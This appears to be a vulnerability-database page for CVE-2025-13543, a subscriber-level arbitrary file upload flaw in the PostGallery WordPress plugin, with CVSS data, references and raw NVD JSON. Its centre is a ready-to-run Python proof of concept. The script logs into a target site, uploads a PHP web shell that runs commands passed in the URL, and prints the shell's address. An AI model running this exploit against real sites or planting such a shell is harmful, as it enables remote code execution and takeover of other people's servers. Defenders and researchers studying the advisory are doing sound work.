Security Vulnerability Report
CVE-2025-13543 CVSS 8.8 HIGH

CVE-2025-13543

Published: 2025-12-04 21:16:08
Last Modified: 2026-04-15 00:35:42

Description

The PostGallery plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the 'PostGalleryUploader' class functions in all versions up to, and including, 1.12.5. This makes it possible for authenticated attackers, with subscriber-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

All versions of the PostGallery plugin up to and including 1.12.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-13543 PoC - PostGallery Arbitrary File Upload
# Target: WordPress site with PostGallery plugin <= 1.12.5

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com'
username = sys.argv[2] if len(sys.argv) > 2 else 'subscriber'
password = sys.argv[3] if len(sys.argv) > 3 else 'password'

# Login to WordPress
session = requests.Session()
login_url = f'{target}/wp-login.php'
login_data = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': f'{target}/wp-admin/',
    'testcookie': '1'
}
session.post(login_url, data=login_data)

# Upload malicious PHP file via PostGallery uploader
upload_url = f'{target}/wp-admin/admin-ajax.php'
files = {
    'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/php')
}
data = {
    'action': 'post_gallery_upload',
    'post_id': '1'
}

try:
    response = session.post(upload_url, files=files, data=data)
    print(f'Status Code: {response.status_code}')
    print(f'Response: {response.text}')

    # If upload successful, try to access the shell
    if response.status_code == 200 and 'upload' in response.text.lower():
        print('[+] File uploaded successfully!')
        print('[+] Access shell at: ' + target + '/wp-content/uploads/post-gallery/shell.php?cmd=whoami')
except Exception as e:
    print(f'[-] Error: {e}')

print('\n[!] Note: This PoC is for educational and authorized testing purposes only.')

References

https://plugins.trac.wordpress.org/browser/postgallery/tags/1.12.5/admin/PostGalleryUploader.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/13348eb5-5001-4ec4-bc6a-44795bbed203?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13543",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-04T21:16:08.037",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The PostGallery plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the 'PostGalleryUploader' class functions in all versions up to, and including, 1.12.5. This makes it possible for authenticated attackers, with subscriber-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/postgallery/tags/1.12.5/admin/PostGalleryUploader.php",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/13348eb5-5001-4ec4-bc6a-44795bbed203?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}